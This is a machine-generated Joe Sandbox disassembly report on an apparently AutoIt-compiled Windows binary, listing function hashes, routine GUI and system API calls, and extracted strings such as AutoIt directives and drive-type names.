                                                                                                                  • Opcode ID: 2b8787a21238dc52a84ca5a1637950ecc846687d51f8b564318c100f3bea0452
                                                                                                                  • Instruction ID: 65098895e3ce9818f6d777472bf3f963029f37ea08084d809be79c210b0ed1cb
                                                                                                                  • Opcode Fuzzy Hash: 2b8787a21238dc52a84ca5a1637950ecc846687d51f8b564318c100f3bea0452
                                                                                                                  • Instruction Fuzzy Hash: AC025C75900219AFDB14DFA8DD89EAE7BBAEF48314F148159F905EB2A0DB309D41CB70
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00DDD0EB
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DDD11C
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00DDD128
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00DDD142
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DDD151
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD17C
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00DDD184
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00DDD18B
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00DDD19A
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DDD1A1
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00DDD1EC
                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00DDD21E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DDD249
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(00000012), ref: 00DDD3BE
                                                                                                                    • Part of subcall function 00DDD385: SetTextColor.GDI32(?,?), ref: 00DDD3C2
                                                                                                                    • Part of subcall function 00DDD385: GetSysColorBrush.USER32(0000000F), ref: 00DDD3D8
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(0000000F), ref: 00DDD3E3
                                                                                                                    • Part of subcall function 00DDD385: GetSysColor.USER32(00000011), ref: 00DDD400
                                                                                                                    • Part of subcall function 00DDD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DDD40E
                                                                                                                    • Part of subcall function 00DDD385: SelectObject.GDI32(?,00000000), ref: 00DDD41F
                                                                                                                    • Part of subcall function 00DDD385: SetBkColor.GDI32(?,00000000), ref: 00DDD428
                                                                                                                    • Part of subcall function 00DDD385: SelectObject.GDI32(?,?), ref: 00DDD435
                                                                                                                    • Part of subcall function 00DDD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD454
                                                                                                                    • Part of subcall function 00DDD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DDD46B
                                                                                                                    • Part of subcall function 00DDD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DDD480
                                                                                                                    • Part of subcall function 00DDD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DDD4A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3521893082-0
                                                                                                                  • Opcode ID: 639d62e522d399a387959f6e2606e94a7d89c4ac8a93fbe52e4f3491614b766a
                                                                                                                  • Instruction ID: 3571e047c376ce8bb5722f3b31157b699552aef7073ebec033813a75c868d17c
                                                                                                                  • Opcode Fuzzy Hash: 639d62e522d399a387959f6e2606e94a7d89c4ac8a93fbe52e4f3491614b766a
                                                                                                                  • Instruction Fuzzy Hash: 76914D72408301BFDB109F64DC48E6BBBABFB86325F144A19F962D62E0D771D944CB62
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00DCA42A
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DCA4E9
                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00DCA527
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DCA539
                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DCA57F
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00DCA58B
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00DCA5CF
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DCA5DE
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DCA5EE
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DCA5F2
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00DCA602
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DCA60B
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00DCA614
                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DCA642
                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DCA659
                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00DCA694
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DCA6A8
                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DCA6B9
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00DCA6E9
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DCA6F4
                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DCA6FF
                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00DCA709
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                  • Opcode ID: 9d72f9de7ec16b179206a0db19394bc5c22ab823bf9a15a70908351705c9703a
                                                                                                                  • Instruction ID: 5cd0c1f90567dcf6ed0240b6bdfbb2d358423674af489d5e8354c53e495d36b6
                                                                                                                  • Opcode Fuzzy Hash: 9d72f9de7ec16b179206a0db19394bc5c22ab823bf9a15a70908351705c9703a
                                                                                                                  • Instruction Fuzzy Hash: 5AA13E71A50219BFEB14DBA9DD49FAE7BBAEB04714F008158F615E72D0D6B0AD00CF64
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBE45E
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00E0DC88,?,\\.\,00E0DBF0), ref: 00DBE54B
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00E0DC88,?,\\.\,00E0DBF0), ref: 00DBE6B1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 150ca73bd6dc03c7bf9f062ca9ef636058380107884e4ac83a28f3794cfca8e0
                                                                                                                  • Instruction ID: 1eac630a78fbb118a85da1ecc30cc8368012962f995527a0acb58bdec75af542
                                                                                                                  • Opcode Fuzzy Hash: 150ca73bd6dc03c7bf9f062ca9ef636058380107884e4ac83a28f3794cfca8e0
                                                                                                                  • Instruction Fuzzy Hash: 0D51E430208301EBC210EF24D8929E9B7A1FBA4714B659D1AF487B7291EB70DE45DF72
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                  • Opcode ID: bae5377ae3c3463d5bb0f944d65865461ea63acd0093c2280b67501a384bb6b0
                                                                                                                  • Instruction ID: 8fab17558731066507051884305d9c409a5b61d8e44df307d9e9e6a0fc8549b6
                                                                                                                  • Opcode Fuzzy Hash: bae5377ae3c3463d5bb0f944d65865461ea63acd0093c2280b67501a384bb6b0
                                                                                                                  • Instruction Fuzzy Hash: AC61E6316543167FDB25BA649C82FBA339CEF15740F189029F949AB1C2FB60DA41CBB1
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32 ref: 00D74956
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D74998
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D749A3
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00D749AE
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00D749B9
                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DEE179
                                                                                                                  • 6FDA0200.COMCTL32(?,000000FF,?), ref: 00DEE1B2
                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00DEE5E0
                                                                                                                    • Part of subcall function 00D749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D74954,00000000), ref: 00D74A23
                                                                                                                  • SendMessageW.USER32 ref: 00DEE627
                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DEE63E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 377055139-4108050209
                                                                                                                  • Opcode ID: a90d6b2665b2e22b78f59394d4c179d265565ae13b990cb7aafd40f91e4f7ab2
                                                                                                                  • Instruction ID: 92f8704607ce547a66fd34f6c282a9cc2c5aa943a1d01b5cc0e6300bf22e7252
                                                                                                                  • Opcode Fuzzy Hash: a90d6b2665b2e22b78f59394d4c179d265565ae13b990cb7aafd40f91e4f7ab2
                                                                                                                  • Instruction Fuzzy Hash: 77128D30600241DFDB21EF25C884BAABBA5FF45305F18856DE599CB2A2D731EC45DBB1
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00DDC598
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DDC64E
                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00DDC669
                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00DDC925
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                  • Opcode ID: 823f853384162a5171e28d6d021f24f1bf406d5545d2ac227bf8ceddd501f68a
                                                                                                                  • Instruction ID: eb231adb000cc64e699576dc8b61ee265c20f9cd1f0c8e39a2de507de987caba
                                                                                                                  • Opcode Fuzzy Hash: 823f853384162a5171e28d6d021f24f1bf406d5545d2ac227bf8ceddd501f68a
                                                                                                                  • Instruction Fuzzy Hash: DDF1E371214302AFE721CF24C889BAABBE5FF45354F08662AF588D63A1C770D844DB71
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,00E0DBF0), ref: 00DD6245
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                  • Opcode ID: 07d7150f1669582f5ad9dcd847cafd0242b3f55baf025efb067ac033a34061e5
                                                                                                                  • Instruction ID: 2d2c0c5e1c9516645eadf062226281238e55dd2180128055eb408f19675afa8e
                                                                                                                  • Opcode Fuzzy Hash: 07d7150f1669582f5ad9dcd847cafd0242b3f55baf025efb067ac033a34061e5
                                                                                                                  • Instruction Fuzzy Hash: EAC181742142118FCB08EF14D451A6E77A6EF95354F08486AF8865B3E6DB20ED4ACBF2
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00DDD3BE
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00DDD3C2
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DDD3D8
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00DDD3E3
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00DDD3E8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00DDD400
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DDD40E
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DDD41F
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00DDD428
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00DDD435
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD454
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DDD46B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00DDD480
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DDD4A8
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DDD4CF
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00DDD4ED
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00DDD4F8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00DDD506
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00DDD50E
                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DDD522
                                                                                                                  • SelectObject.GDI32(?,00DDD0B5), ref: 00DDD539
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DDD544
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00DDD54A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DDD54F
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00DDD555
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00DDD55F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996641542-0
                                                                                                                  • Opcode ID: 56bc5254e5749983f1898be2ad9b30d9dd43194dd5ffe676b366e00a54b1ee27
                                                                                                                  • Instruction ID: cb2bc966bf22390f79ffddb168f1a4d575e434b4f707250a2ff82a4b7908e7c9
                                                                                                                  • Opcode Fuzzy Hash: 56bc5254e5749983f1898be2ad9b30d9dd43194dd5ffe676b366e00a54b1ee27
                                                                                                                  • Instruction Fuzzy Hash: CA511B71900208BFDF109FA8DC48EAE7BBBEB09320F258515F915EB3A1D7759A40DB60
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DDB5C0
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DDB5D1
                                                                                                                  • CharNextW.USER32(0000014E), ref: 00DDB600
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DDB641
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DDB657
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DDB668
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DDB685
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00DDB6D7
                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DDB6ED
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DDB71E
                                                                                                                  • _memset.LIBCMT ref: 00DDB743
                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DDB78C
                                                                                                                  • _memset.LIBCMT ref: 00DDB7EB
                                                                                                                  • SendMessageW.USER32 ref: 00DDB815
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DDB86D
                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00DDB91A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00DDB93C
                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00DDB986
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DDB9B3
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00DDB9C2
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00DDB9EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                  • Opcode ID: 9eeec08fc902d3584f74403c77166b976341d91096573db96fc4eb835d48641d
                                                                                                                  • Instruction ID: 58faedd61366e9d5d0d999f0c018f477b69fb40aaf9a8fc03cd3c1ad8b758add
                                                                                                                  • Opcode Fuzzy Hash: 9eeec08fc902d3584f74403c77166b976341d91096573db96fc4eb835d48641d
                                                                                                                  • Instruction Fuzzy Hash: 12E16975900218EBDF209F91CC84AEE7BB9EF05728F15815BF959AA290DB708A41DF70
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DD7587
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DD759C
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DD75A3
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD7605
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DD7631
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DD765A
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DD7678
                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DD769E
                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00DD76B3
                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DD76C6
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00DD76E6
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DD7701
                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DD7715
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DD772D
